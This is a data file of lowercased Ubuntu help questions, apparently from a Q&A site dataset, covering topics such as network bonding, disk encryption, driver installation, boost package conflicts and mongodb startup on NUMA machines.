293339	how to start vmware virtual network editor from command line	i 've just installed vmware workstation 9 on a headless ubuntu 12.04 server . how can i run the virtual network editor from the command line ? when attempting to run it via the vmware program over x ( edit > virtual network editor ) , nothing happens - thus i am looking for how to start it stand-alone . what is the command to run it alone ?
293341	horizontal title bar shadow while in full screen	while in full screen the horizontal shadow of the title bar ( i am not too sure about its name ) appears on top of everything . how can i get rid of it ? it 's quite distracting while coding in guake mode and annoying while watching movies . in the picture i 've setup guake with some transparency ( that 's why you can see things underneath ) , but the shadow is on the top of everything while i am in fullscreen . this , as i have already said , happens to me both while i am watching movies or programming in fullscreen mode . this usually happens after awaking the laptop from hibernation . now it looks like it has gone , but i am still wandering if someone knows something about it . and here back it is > : [ i 'm running ubuntu 13.04
293345	questions about full disk encryption	completely new user here , i 've been reading for a couple of hours about ubuntu 's full disk encryption but i just do n't understand some basic points . when installing ubuntu 's full disk encryption , what happens to other drives that you have on the computer ? do you have to encrypt them separately using cryptsetup or truecrypt ? and , if so , is there any way around having to enter each of their passwords each time you login ? i have 4 different drives and it would be nice to just have one master password instead of having to enter 5 each time . if all the drives are encrypted during ubuntu installation what happens if you want to keep the data on them ( the only option i see is to erase disk and install ubuntu ) . at the moment i have ubuntu installed on an ssd with the other drives mounted as media , i plan on doing a re-install with full disk encryption if the process is simple enough .
293348	virtual machine inside ubuntu	i just want to get some information about virtual machines , i just would like to make a virtualization of ubuntu inside ubuntu , just to run unix benchmark to both ubuntu one with full computer and another with less options itĺ a home work
293349	how to check network card bonding speed in ubuntu 10.04	i have ubuntu 10.04 install dell r710 server i have configured the network bonding using the below steps sudo apt-get install ifenslave -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - vi /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master bond0 auto bond0 iface bond0 inet static address 172.24.1.10 gateway 172.24.1.1 netmask 255.255.255.0 dns-nameservers 172.24.1.50 dns-search xxx.xxx bond-mode balance-rr bond-miimon 100 bond-lacp-rate 1 bond-slaves none -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cat /proc/net/bonding/bond0 ethernet channel bonding driver : v3.5.0 ( november 4 , 2008 ) bonding mode : load balancing ( round-robin ) mii status : up mii polling interval ( ms ) : 100 up delay ( ms ) : 0 down delay ( ms ) : 0 slave interface : eth0 mii status : up link failure count : 0 permanent hw addr : xx : xx : xx : xx : xx : xx slave interface : eth1 mii status : up link failure count : 0 permanent hw addr : xx : xx : xx : xx : xx : yy -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- **its not showing the bonding speed . ** -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ethtool eth0 settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes link partner advertised link modes : not reported link partner advertised pause frame use : no link partner advertised auto-negotiation : no speed : 1000mb/s duplex : full port : twisted pair phyad : 1 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : g wake-on : g link detected : yes ethtool eth1 settings for eth1 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes link partner advertised link modes : not reported link partner advertised pause frame use : no link partner advertised auto-negotiation : no speed : 1000mb/s duplex : full port : twisted pair phyad : 1 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : g wake-on : g link detected : yes both network card speed is 1000mbps . how do i check the bond0 network speed .
293354	scp autocompletion displays websites as well as file names	when using autocompletion it reveals web sites and file names . so if i type scp goo and then type the tab key it displays gooey.zip goo.freelogs.com : googleads.g.doubleclick.net : google.tucows.com : googleads2.g.doubleclick.net : google-earth-stable_current_amd64.deb googlus.com : googleadsense.ya.com : the question is , where does it get these web sites from in the autocomplation process . i know the gooey.zip file is obviously a file in my directory , but where are the web sites coming from ? ps : i have uninstalled zeitgeist if that matters
293356	how to open a particular port in ubuntu ?	my soulseek client nicotine+ checks my open ports during initial configuration and promts that the one port number it needs is closed , cutting me off frmo about 50 % of the users . is there anyway i can open that particular port for the application to use ? running ubuntu desktop 13.04 . i have not manually installed any firewalls , but not sure if its included in the default installation .
293360	bluetooth indicator disappears on turning off bluetooth	everytime i turn off my bluetooth , the indicator icon in the system tray disappears , as opposed to just greying out as expected . next time i need to go to the settings select bluetooth to turn it on , which makes the indicator to reappear . is there anyway i can make the indicator icon not disappear but stay greyed out when not in use ?
293363	unable to enter proxy authentication details in synaptic ubuntu 13.04	hi i recently installed ubuntu 13.04 , i work behind a proxy and it has all sorts of complications , authentication , special character in the password . so i used to enter the proxy settings in the synaptic and use . but in ubuntu 13.04 - 64 bit , i 'm unable to enter the authentication details . i 'm able to open up the window but ca n't enter the details .
293365	allowing apache to access /home/user directory	i have a text file at /home/user/textdata that user change it everyday and i have a php script at /var/www/ that want to read that text file . how to add the permissions ?
293366	how do i upgrade ubuntu on a partition using an iso image ?	i 've searched through some answers here , and while one was marked as a duplicate , it specifically dealt with an apt upgrade , so i do n't think it applies to my question . currently i have 12.10 on my machine sitting next to windows 7 . upgrading to 13.04 via the software updater does n't seem to work -- it gets hung up on some packages and then reverts and quits out of the upgrader . i burned an .iso image and thought to upgrade with that . when i use it , though , my only options are to wipe the drive entirely or place the upgrade next to the `` other os 's '' the upgrader detects . i chose the latter , hoping it would replace 12.10 and upgrade to 13.04 . not so . now i have 12.10 and 13.04 on the same machine . how can i delete these partitions and run a clean install while keeping windows 7 on the drive ? i know i can use gparted , but do n't know if i should use the format option on the ext and linux-swap and format to ntfs or to somehow just delete these entirely ( is there a gparted option for that ? ) any help would be greatly appreciated .
293368	apt-fast does not show download size	i use apt-fast to download and install packages on my system . what i have noticed is apt-fast does not show me how much data will be downloaded , as apt-get does : the following new packages will be installed : dkms libgsoap2 virtualbox virtualbox-dkms virtualbox-qt 0 upgraded , 5 newly installed , 0 to remove and 6 not upgraded . need to get 19.9 mb of archives . after this operation , 77.9 mb of additional disk space will be used . how can i avail this feature when installing from apt-fast ?
293372	stuck partition on mac .	after i used refit to put linux on my mac , it tried installing windows , but i stopped it . the partition does n't show up in terminal or disk utility . it 's like a 'ghost ' partition and it shows up when i boot holding alt . i ca n't use it because it says no operating system found . how do i delete this ?
293377	sorry ubuntu 13.04 has encountered an internal error	i have been getting error reports at the start after booting . sometimes its the same error that pop ups again . sometimes its a different one . is this because of some missing package or some service terminated by the os during boot ? . can this be resolved ? this occurs after updating from 12.10 to 13.04 .
293379	unsatisfiedlinkerror on xawt when running hec-hms.sh	i am a recent adopter of linux and this problem has got me stumped . i use hec-hms and hec-dssvue for work on a regular basis . i have been using the widows versions in wine but they are really buggy . so i decided to try out the linux versions . the links below will take you to the download pages for these two programs . they are free programs for hydrology and data management . once i install them and attempt to run the shell file ( hec-hms.sh for example ) i get a ton of java errors that i do not understand . if i had to guess i would say that the java files in question can not be found . when i check to see if java is installed it is . here is the output from the terminal from trying to run hec-hms.sh : exception in thread `` thread-1 '' java.lang.unsatisfiedlinkerror : /home/smythe/hec/hec-hms35/java/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( unknown source ) at java.lang.classloader.loadlibrary ( unknown source ) at java.lang.runtime.load0 ( unknown source ) at java.lang.system.load ( unknown source ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( unknown source ) at java.lang.classloader.loadlibrary ( unknown source ) at java.lang.runtime.loadlibrary0 ( unknown source ) at java.lang.system.loadlibrary ( unknown source ) at sun.security.action.loadlibraryaction.run ( unknown source ) at java.security.accesscontroller.doprivileged ( native method ) at sun.awt.nativelibloader.loadlibraries ( unknown source ) at sun.awt.debughelper. < clinit > ( unknown source ) at java.awt.component. < clinit > ( unknown source ) at javax.swing.imageicon. < clinit > ( unknown source ) at hms.i.c ( unknown source ) at hms.i.b ( unknown source ) at hms.k.run ( unknown source ) at java.lang.thread.run ( unknown source ) exception in thread `` thread-4 '' java.lang.unsatisfiedlinkerror : /home/smythe/hec/hec-hms35/java/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( unknown source ) at java.lang.classloader.loadlibrary ( unknown source ) at java.lang.runtime.load0 ( unknown source ) at java.lang.system.load ( unknown source ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( unknown source ) at java.lang.classloader.loadlibrary ( unknown source ) at java.lang.runtime.loadlibrary0 ( unknown source ) at java.lang.system.loadlibrary ( unknown source ) at sun.security.action.loadlibraryaction.run ( unknown source ) at java.security.accesscontroller.doprivileged ( native method ) at java.awt.toolkit.loadlibraries ( unknown source ) at java.awt.toolkit. < clinit > ( unknown source ) at sun.print.cupsprinter. < clinit > ( unknown source ) at sun.print.unixprintservicelookup.getdefaultprintservice ( unknown source ) at sun.print.unixprintservicelookup.refreshservices ( unknown source ) at sun.print.unixprintservicelookup $ printerchangelistener.run ( unknown source ) exception in thread `` main '' java.lang.noclassdeffounderror : could not initialize class java.awt.toolkit at java.awt.color. < clinit > ( unknown source ) at hms.model.l. < init > ( unknown source ) at hms.model.projectmanager. < init > ( unknown source ) at hms.hms. < init > ( unknown source ) at hms.hms.main ( unknown source ) exception in thread `` thread-2 '' java.lang.noclassdeffounderror : could not initialize class sun.print.cupsprinter at sun.print.unixprintservicelookup.getdefaultprintservice ( unknown source ) at javax.print.printservicelookup.lookupdefaultprintservice ( unknown source ) at hms.util.f.run ( unknown source ) at java.lang.thread.run ( unknown source ) i get similar outputs when i try to run hec-dssvue.sh . if anyone could shed some light on a solution i would really appreciate it . the problem turned out to be that the program needed 32 bit versions of the particular dependencies .
293383	13.04 desktop suddenly disappeared	i have seen an answer from version 12 to try unity -- reset but when i try this , it 's deprecated i was able to run ccsm , but i do n't know what to do to get back the bar , and the menu . equally important , what did i do to get it to disappear ? it 's not just the docking bar . i have no window borders . it 's like the window manager is broken . is there any way for me to manually kill the window manager and run a different one while i am finding out what is happening ?
293392	mousepad in xubuntu 13.04 prints unwanted line numbers	mousepad is the standard editor in xubuntu 13.04 . if used for printing a file it always prints line numbers , even if the option is switched off in the print dialog . what to do about it ?
293395	problem install in boost lib	from how to install boost lib , i followed the solution but i was met with the following message : to add more information , i was trying to install the libs due to this thread i posted : python keplerian toolbox some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libboost-all-dev : depends : libboost-dev but it is not going to be installed depends : libboost-chrono-dev but it is not going to be installed depends : libboost-date-time-dev but it is not going to be installed depends : libboost-filesystem-dev but it is not going to be installed depends : libboost-graph-dev but it is not going to be installed depends : libboost-graph-parallel-dev but it is not going to be installed depends : libboost-iostreams-dev but it is not going to be installed depends : libboost-locale-dev but it is not going to be installed depends : libboost-math-dev but it is not going to be installed depends : libboost-mpi-dev but it is not going to be installed depends : libboost-mpi-python-dev but it is not going to be installed depends : libboost-program-options-dev but it is not going to be installed depends : libboost-python-dev but it is not going to be installed depends : libboost-random-dev but it is not going to be installed depends : libboost-regex-dev but it is not going to be installed depends : libboost-serialization-dev but it is not going to be installed depends : libboost-signals-dev but it is not going to be installed depends : libboost-system-dev but it is not going to be installed depends : libboost-test-dev but it is not going to be installed depends : libboost-thread-dev but it is not going to be installed depends : libboost-timer-dev but it is not going to be installed depends : libboost-wave-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i fix this ? ii libboost-atomic1.53-dev 1.53.0-3 amd64 atomic data types , operations , and memory ordering constraints ii libboost-atomic1.53.0 1.53.0-3 amd64 atomic data types , operations , and memory ordering constraints ii libboost-chrono1.53-dev 1.53.0-3 amd64 c++ representation of time duration , time point , and clocks ii libboost-chrono1.53.0 1.53.0-3 amd64 c++ representation of time duration , time point , and clocks ii libboost-context1.53-dev 1.53.0-3 amd64 provides a sort of cooperative multitasking on a single thread ii libboost-context1.53.0 1.53.0-3 amd64 provides a sort of cooperative multitasking on a single thread ii libboost-date-time1.49.0 1.49.0-3.2ubuntu1 amd64 set of date-time libraries based on generic programming concepts ii libboost-date-time1.53-dev 1.53.0-3 amd64 set of date-time libraries based on generic programming concepts ii libboost-date-time1.53.0 1.53.0-3 amd64 set of date-time libraries based on generic programming concepts ii libboost-exception1.53-dev 1.53.0-3 amd64 set of date-time libraries based on generic programming concepts ii libboost-filesystem1.53-dev 1.53.0-3 amd64 filesystem operations ( portable paths , iteration over directories , etc ) in c++ ii libboost-filesystem1.53.0 1.53.0-3 amd64 filesystem operations ( portable paths , iteration over directories , etc ) in c++ ii libboost-graph-parallel1.53-dev 1.53.0-3 amd64 generic graph components and algorithms in c++ ii libboost-graph-parallel1.53.0 1.53.0-3 amd64 generic graph components and algorithms in c++ ii libboost-graph1.53-dev 1.53.0-3 amd64 generic graph components and algorithms in c++ ii libboost-graph1.53.0 1.53.0-3 amd64 generic graph components and algorithms in c++ ii libboost-iostreams1.49.0 1.49.0-3.2ubuntu1 amd64 boost.iostreams library ii libboost-iostreams1.53-dev 1.53.0-3 amd64 boost.iostreams library development files ii libboost-iostreams1.53.0 1.53.0-3 amd64 boost.iostreams library ii libboost-locale1.53-dev 1.53.0-3 amd64 c++ facilities for localization ii libboost-locale1.53.0 1.53.0-3 amd64 c++ facilities for localization ii libboost-math1.53-dev 1.53.0-3 amd64 boost.math library development files ii libboost-math1.53.0 1.53.0-3 amd64 boost.math library ii libboost-mpi-python1.53-dev 1.53.0-3 amd64 c++ interface to the message passing interface ( mpi ) , python bindings ii libboost-mpi-python1.53.0 1.53.0-3 amd64 c++ interface to the message passing interface ( mpi ) , python bindings ii libboost-mpi1.53-dev 1.53.0-3 amd64 c++ interface to the message passing interface ( mpi ) ii libboost-mpi1.53.0 1.53.0-3 amd64 c++ interface to the message passing interface ( mpi ) ii libboost-program-options1.53-dev 1.53.0-3 amd64 program options library for c++ ii libboost-program-options1.53.0 1.53.0-3 amd64 program options library for c++ ii libboost-python1.53-dev 1.53.0-3 amd64 boost.python library development files ii libboost-python1.53.0 1.53.0-3 amd64 boost.python library ii libboost-random1.53-dev 1.53.0-3 amd64 boost random number library ii libboost-random1.53.0 1.53.0-3 amd64 boost random number library ii libboost-regex1.53-dev 1.53.0-3 amd64 regular expression library for c++ ii libboost-regex1.53.0 1.53.0-3 amd64 regular expression library for c++ ii libboost-serialization1.53-dev 1.53.0-3 amd64 serialization library for c++ ii libboost-serialization1.53.0 1.53.0-3 amd64 serialization library for c++ ii libboost-signals1.53-dev 1.53.0-3 amd64 managed signals and slots library for c++ ii libboost-signals1.53.0 1.53.0-3 amd64 managed signals and slots library for c++ ii libboost-system1.53-dev 1.53.0-3 amd64 operating system ( e.g . diagnostics support ) library ii libboost-system1.53.0 1.53.0-3 amd64 operating system ( e.g . diagnostics support ) library ii libboost-test1.53-dev 1.53.0-3 amd64 components for writing and executing test suites ii libboost-test1.53.0 1.53.0-3 amd64 components for writing and executing test suites ii libboost-thread1.53-dev 1.53.0-3 amd64 portable c++ multi-threading ii libboost-thread1.53.0 1.53.0-3 amd64 portable c++ multi-threading ii libboost-timer1.53-dev 1.53.0-3 amd64 c++ wall clock and cpu process timers ii libboost-timer1.53.0 1.53.0-3 amd64 c++ wall clock and cpu process timers ii libboost-wave1.53-dev 1.53.0-3 amd64 c99/c++ preprocessor library ii libboost-wave1.53.0 1.53.0-3 amd64 c99/c++ preprocessor library ii libboost1.53-all-dev 1.53.0-3 amd64 boost c++ libraries development files ( all ) ii libboost1.53-dev 1.53.0-3 amd64 boost c++ libraries development files
293396	how do i turn down gpu heat / usage on a sony vaio z21 ?	i have a sony vaio z21 ( vpc2 ) and am experiencing some gpu heat/usage issues since kernel 3.2 up till 3.9 . i have installed laptop-mode-tools , configured powertop and added the following to grub : grub_cmdline_linux= '' i915.i915_enable_rc6=1 pcie_aspm=force drm.vblankoffdelay=1 i915.lvds_downclock=1 i915.semaphores=1 '' this last line was found in a tutorial specific for this device , stated that it will provide better power management . doing all this managed to get back to 11.7w , measured while typing this post . but my device still keeps blowing out some heated air from the casing , and the fan keeps running . my device is new and therefore very clean and does not have this problem when running windows . i also experience this when connected to the pmd which contains a ati graphics card . below is a screenshot of powertop , showing the gpu 's active state while writing this post : http : //i.imgur.com/dpn8oop.png , screenshot shows gpu active state of 92.8 procent my questions : - do other users , with the same model , experience this as well ? - are there ways for me to dial down the gpu usage as it now runs too hot ? - is there something like the cpu governor , for gpu ?
293400	problem in dual boot with ubuntu 12.04 and windows 8 ( ca n't choose an os when boot )	in my laptop initially it was windows 7 and 8 to dual boot.the status of the partitions are `` system '' for win 7 and `` boot '' for win 8 . then i formatted win 7 which was the system partition and installed ubuntu 12.04 with windows 8 ( i chose install ubuntu alongside with windows 8 ) . now it does n't appear any list to select an operating system instead it directly loads ubuntu . how to solve this ?
293407	ubuntu terminal is not working properly in vi editor	recently i installed ubuntu in my laptop for using c programming . but when i open the terminal and typed vi test.c , it open it but it will not work properly . when i pressed backspace it will not work and when i press arrow key it will print some alphabets . what will i do to work properly . please anybody help for this related problem . thank you
293408	formating a usb stick with ubuntu 12.10	i know there 's a few relevant questions answered but when i try to format it through disk utility the only answer i get is : '' error synchrinizing after initial wipe : timed out waiting for object ( udisks-error-quark,0 ) i 'm new to linux , had no problem with debian , ubuntu seemed even friendlier in the start but seems i ca n't do a simple thing like formatting a usb stick . i know that some of you will tell me to download gparted or something but since ubuntu by default has a disk utility that does the job it should work , should n't it ? is something wrong with my dash ? is it something fixable or something missing ? when a utility is already there it should work or at least know why it does n't . installing and using something else is not a good solution . formatting is so simple and easy on debian ...
293413	how to open a photo in picasa 3 ?	i downloaded picasa 3 using wine for my ubuntu 12.10 and installed . the problem is , i 'm unable to open my photo using picasa . i 'm trying `` open with '' with mouse right-click on the file but unable to find the picasa option there . how to get it ? ?
293418	how to enable bluetooth for dell inspiron laptop ?	how do i enable bluetooth for my dell inspiron laptop ? it tells no adapters found .
293426	system monitoring tools for ubuntu	i am looking for system monitoring tools which are gui and cli or web based which include basic functions such as cpu usage ram usage swap usage disk usage ( space / i/o ) heat monitoring i know there are many tools i can use , but i am looking for a single tool that has these basic functions .
293429	how to stop bootchart ?	bootchart set up png file every time machine starting . how to make bootchart nor working without remove it ? thanks
293432	updating problem [ broken package ]	i am not able to update software by package manager and also by terminal it show the following message : error : bokencount > 0 well i tried package manager so it says me to fix broken package first so i went in package tab and clicked repair broken packages then it started showing zero broken package but now it started showing new error : **e : /var/cache/apt/archives/burg-theme-lightness_0.5.0-1_all.deb : subprocess new post-removal script returned error exit status 2**
293434	backlight will not dim using function key	laptop is samsung r580 with amd/ati , running ubuntu 13.04 . the function key has no effect on brightness . screen brightness is ok when operating on mains power , but when mains supply is disconnected screen dims to a point that is almost impossible to see . plug mains back in , all good . i would be happy if screen would maintain brightness with or without mains connected . help ! ! note : had same problem with previous version of ubuntu !
293444	how can i quickly convert a gif file to a video ?	i have a small animation formatted as a gif image file which i would like to convert to a video . is that possible ?
293446	how to retrive encryption passpharase ?	when installing ubuntu i chose to encrypt my home drive and after installation update information window came up : where i had to write down encryption passphrase . well i closed it and it does n't pop up any more . so the question is where can i find it to write down the passphrase ?
293450	asus eeepc 1015cx ubuntu 32 bits or 64bits ?	i created a bootable thumbdrive that i can use to run on my other laptop , the toshiba qosmio.. however , when i tried to do a run from thumbdrive , it doesnt work . when i tried installing it i get this error '' none type '' object has no attribute 'get_info' c : \user\hp\appdata\local\temp\wubi-12.04rev266 im not sure what version have i installed on my thumbdrive . but im suspecting it is a 64bit . so the question is , use 64bit or use 32 bit ?
293454	what have i to do to change from bios to ( u ) efi after installation ?	i have here a new bought laptop . it 's the first device with ( u ) efi i was working with . at first i did not get the installation running , so i switched back to bios legacy mode and installed ubuntu in that mode . all right . now i want to add the preinstalled windows back into the boot loader to allow multiboot . this works only via efi . so i googled around and found this link . i modified things a bit as i was after some tasting able to boot in efi mode the grub on the live cd and then booted manually into linux . so in the end i have a grub installed on my efi system partition and i am able to boot into linux directly from efi . now i have seen , that the grub.cfg has two locations : /boot/grub/ and /boot/efi/efi/grub/ . on runing update-grub only the version in /boot/grub/ will be affected . for the ( manual ) installation this is not an issue but any kernel update will not alter the important /boot/efi/efi/grub/grub.cfg . i tried creating a symlink but it seems that the file gets deleted before rewriting . so the link is lost . so my questions in detail : what have i to do to make the updates automatically ? should i mount -o bind the directory /boot/efi/efi/grub to /boot/grub ? any better solutions ? is it possible to make grub look into another position ? where will an updated grub.efi be installed ? are there other issues that i forgot so far ?
293459	how do i configure /etc/hosts and /etc/php5/apache2/php.ini for sendemail	i installed sendmail on my ubuntu 12.04 web-server . i also configured the [ mail function ] and i tried to send emails ... the message from the php code i wrote told me that the email has been send successfully but , there is nothing received in my emails . i also tried to look at some solved problems ... ... i came across an advise that suggests to edit /etc/hosts file but i am confused identifying between localhost and localdomain .. my virtual machine ( webserver ) name is abc-hr-system , my hostname ( after i run the command hostname is ) xyz . what can i do to solve this problem ? thanks a lot !
293462	install windows on the same drive as ubuntu	i have a drive with ubuntu 12.04 currently on it . can i and if i can then how , install windows 7 on that same drive without removing the ubuntu installation ? ( being able to use both ) please notice that i already have ubuntu 12.04 .
293463	how to share dsl ( pppoe ) connection	how to share dsl ( pppoe ) connection ? i 'm using ubuntu 12.10 . i have a dsl internet connection ( pppoe ) . in our local area network only one can be connected to the dsl connection at a same time . so i want to share the dsl connection from my computer so that others can connect to internet through my computer . some also have windows xp in our network . no wi-fi , all are connected through wier . please help
293468	how should i start mongodb on a numa machine ?	when i first installed mongodb 2.2.3 with apt-get , following the instructions from 10gen installation guide , it auto starts when the server starts . however , after following the instructions in /var/log/mongodb/mongodb.log : tue apr 30 11:35:28.643 [ initandlisten ] ** warning : you are running on a numa machine . tue apr 30 11:35:28.643 [ initandlisten ] ** we suggest launching mongod like this to avoid performance problems : tue apr 30 11:35:28.643 [ initandlisten ] ** numactl -- interleave=all mongod [ other options ] tue apr 30 11:35:28.643 [ initandlisten ] tue apr 30 11:35:28.643 [ initandlisten ] ** warning : /proc/sys/vm/zone_reclaim_mode is 1 tue apr 30 11:35:28.643 [ initandlisten ] ** we suggest setting it to 0 tue apr 30 11:35:28.643 [ initandlisten ] ** http : //www.kernel.org/doc/documentation/sysctl/vm.txt tue apr 30 11:35:28.643 [ initandlisten ] it does n't auto start any more . so now i have to enter : echo 0 > /proc/sys/vm/zone_reclaim_mode & & numactl -- interleave=all /usr/bin/mongod -- config /etc/mongodb.conf & manually every time in a terminal to start it . however , i suspect starting it this way also causes service mongodb stop/restart to fail . it will throw a stop : unknown instance : error . is there a proper way to resolve this ?
293474	age of empires 2 hd not working good	i have ubuntu 13.04 , i have just installed age of empires 2 hd on wine 1.5.29 , i can start the game and open the campaigns but it displays a black screen after then : is the problem from wine , or from the game or from ubuntu ? thanks .
293486	ubuntu 13 change drm_kms_helper poll param	i had ubuntu for 3 years ( since version 11 ) . every version i had , had the intel graphics bug in it 's kernel - randomly freezing mouse . i fixed this problem using `` echo n > /sys/module/drm_kms_helper/parameters/poll '' ( changing it from y to n ) , as described in http : //souriguha.wordpress.com/2011/03/08/how-to-solve-problem-with-thinkpadkslowd-kworker-on-linux-kernel-2-35-2-36/ . i upgraded to version 13 , and unfortunately this does n't work ( there is no /etc/modprobe.d/local.conf ) , i searched the web and tried adding the command above to /etc/rc.local , when i check the param it seem to be set to n , but still did n't solve the problem , so tried setting it to 0 , and checked it , it turns back to y somehow . the freezes still occurs : ( my kernel version is : linux *-thinkpad-t400 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux . what should i do ? and on what version this bug will be fixed ( it 's really annoying since v11 ) ? btw : if someone could explain to me what is the relation between polling and the mouse ( i think it 's the whole screen ) ? !
293487	after upgrading to 13.04 , plugging in external display to my laptop causes the displays to freeze randomly	i had installed 12.10 on my lenovo ideapad z560 laptop at work last week . i use it together with an external monitor and everything was working fine and then today i upgraded the distribution to 13.04 . now when i plug in the external monitor , after a while the display on both screens freeze ( seemingly ) randomly . i did a google search and found this . i also tried the suggestion given in comment # 14 on that link , which is basically adding this ppa to the repositories list and installing the packages in it . but when i checked on synaptic , no packages of the name xserver-xorg-input-evdev_2.6.99.901-1ubuntu3 were included . another comment on the first link i provided said it might be related to chromium , but i verified that this also happened when i was using firefox instead . i can not seem to find any other fixes , so i 'm stuck at this point . any suggestions will be appreciated .
293488	no audio after new updates	yesterday after new updates my sound is gone . lsmod module size used by parport_pc 28152 0 ppdev 17073 0 bnep 18036 2 rfcomm 42641 0 bluetooth 228619 10 bnep , rfcomm binfmt_misc 17500 1 snd_hda_codec_hdmi 36913 1 snd_hda_codec_realtek 78399 1 snd_hda_intel 39619 0 snd_hda_codec 136453 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel uvcvideo 80847 0 videobuf2_vmalloc 13056 1 uvcvideo videobuf2_memops 13202 1 videobuf2_vmalloc videobuf2_core 40513 1 uvcvideo videodev 129260 2 uvcvideo , videobuf2_core snd_hwdep 13602 1 snd_hda_codec snd_pcm 97451 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_timer 29425 1 snd_pcm snd 68876 7 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_hda_codec , snd_hda_intel coretemp 13355 0 kvm_intel 132891 0 kvm 443165 1 kvm_intel soundcore 12680 1 snd microcode 22881 0 lpc_ich 17061 0 intel_ips 17978 0 psmouse 95870 0 serio_raw 13215 0 i915 600351 3 drm_kms_helper 49394 1 i915 ndiswrapper 283323 0 drm 286313 4 i915 , drm_kms_helper mei 41158 0 i2c_algo_bit 13413 1 i915 topstar_laptop 12837 0 sparse_keymap 13890 1 topstar_laptop video 19390 1 i915 mac_hid 13205 0 lp 17759 0 parport 46345 3 lp , ppdev , parport_pc hid_generic 12540 0 ahci 25731 3 libahci 31364 1 ahci usbhid 47074 0 hid 101002 2 hid_generic , usbhid r8169 67446 0 my module is gone too .
293493	keyboard light and screen brightness at 100 % after startup	after every restart the default screen and keyboard light is at 100 % and it is quite annoying . is there a workaround for this ?
293497	strange behaviour when close the lid of my mba	i have an mba and i 'm used to close the lid without any problem in osx . i 've installed ubuntu 13.04 in dual boot with refit . the problem is that sometimes something strange happens when i close the lid , today for example i closed it for lunch break and when i came back to work the laptop was on ( the lid still closed ) , very hot with the fan at high speed . what can i do to have a robust suspend on lid closure ? is the hibernate option better ? thanks in advance . edit : my `` when the lid is closed '' option is already on `` suspend '' , so i suppose that the suspension does n't work properly .
293499	automount partitions in ubuntu 13.04	i installed fresh copy of ubuntu 13.04 and i want to automount my partitions . previously i was using pysdm and now its not available . anyways to accomplish this ?
293501	ipod classic 80gb will not synch in rythmbox or banshee etc in ubuntu 13.04	i have tried getting my ipod classic 80gb to synch in rythmbox or banshee , running on ubuntu 13.04 . rythmbox crashed , banshee starts but then seems to get stuck . this is a new installation and has had all current updates . is there anything i can do , or do i just have to ait for the fix ? i tried googling the problem , but just found out that it seems to affect clementine as well . many thanks for reading and bigger thanks to the person who can fix this . ian ( complete noob )
293509	ubuntu 13.04 with nvidia geforce fx 5200	i installed pure ubuntu 13.04 and tried to install the restricted driver , but it became yellow-screen after reboot . i found this question : help ! 13.04 installation nvidia driver i do in this way : sudo apt-get remove nvidia* sudo apt-get install build-essential linux-source linux-headers-`uname -r` sudo apt-get install nvidia-current sudo depmod -a sudo depmod -a sudo modprobe nvidia_current but it says : fatal : module nvidia_current not found . so i typed : sudo modprobe nvidia_304 and then sudo lsmod shows that nvidia is loaded but when i ran sudo /etc/init.d/lightdm restart and logged in , i can only see the background ! then i ran sudo nvidia-xconfig sudo reboot and when it 's rebooted , the resolution became small ( small ? perhaps bad english ) , and i can still see the background only . what can i do ? edit : $ sudo nvidia-settings error : the control display is undefined ; please run `nvidia-settings -- help` for usage information .
293512	how to make ubuntu black and white ?	this might be a somewhat strange question . i had an argument with a windows person and i told him that linux is so much more customization then he told me to prove it and i told him ... .. now i need to make ubuntu black and white to prove linux is better i want to make ubuntus menus icons , folder icons etc ... except the running apps black and white something like this ? ? and stock icons . so can any one point me in a direction i need to go thank you in advanced
293518	firefox keeps changing http : //localnode:8080 to http : //localnode.com8080/ . how do i change this ?	i just installed ubuntu 12.04 . on version 11 it was doing this , but now it has changed . i am a ham radio operator and i am trying to use the wrt54g linksys router for digital communications .
293524	gearing a glitchy , static-y sound coming out of the speaker	i recently upgraded my hardware at the same time i upgrade from 12.04 to 13.04 but i do n't think it comes from the 13.04 update itself . i keep hearing a glitchy , static-y sound coming out of the speaker connected directly to the motherboard ( no audio card ) . it seems the sound gets worst when i move the mouse , scroll pages or the computer seems to be doing work ( ie . refreshing a web page ) . this does n't stop with muting the volume in ubuntu , i have to close the speakers to make it stop .
293525	auto screenshot capture tool for linux	i use zscreen in windows to capture my screen every 2 minute and save them on local file system with date time label . is there any tool or script to doing this on linux ubuntu ?
